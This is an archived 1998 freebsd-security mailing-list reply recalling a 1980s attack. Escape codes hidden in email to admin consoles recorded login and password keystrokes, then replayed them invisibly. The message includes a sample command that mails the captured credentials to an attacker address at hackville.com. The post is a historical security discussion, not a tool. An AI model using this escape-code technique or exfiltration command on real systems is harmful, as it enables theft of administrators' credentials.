Date: Thu, 10 Sep 1998 14:02:54 -0700 (PDT) From: "Dan Seafeldt, AZ.COM System Administrator" <yankee@az.com> To: freebsd-security@FreeBSD.ORG Subject: Re: Err.. cat exploit.. (!) Message-ID: <Pine.BSF.3.91.980910134421.12580F-100000@gate.az.com> In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu>
next in thread | previous in thread | raw e-mail | index | archive | help
A similar but different technique was used at a wa university computer center here in the 80's - A 'bomb' or sequences of escape codes imbedded in a routine sounding email message to the root console or staff console which which caused the terminals in the staff/admin offices to record certain keypresses as a macro string (specifically entry of login/password) then at the right time enter/playback something like this while sitting at a prompt: <INVISIBLE ATTR> echo '...recorded keypresses...' > tmpfile sendmail hack@hackville.com < tmpfile <VISIBLE> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.980910134421.12580F-100000>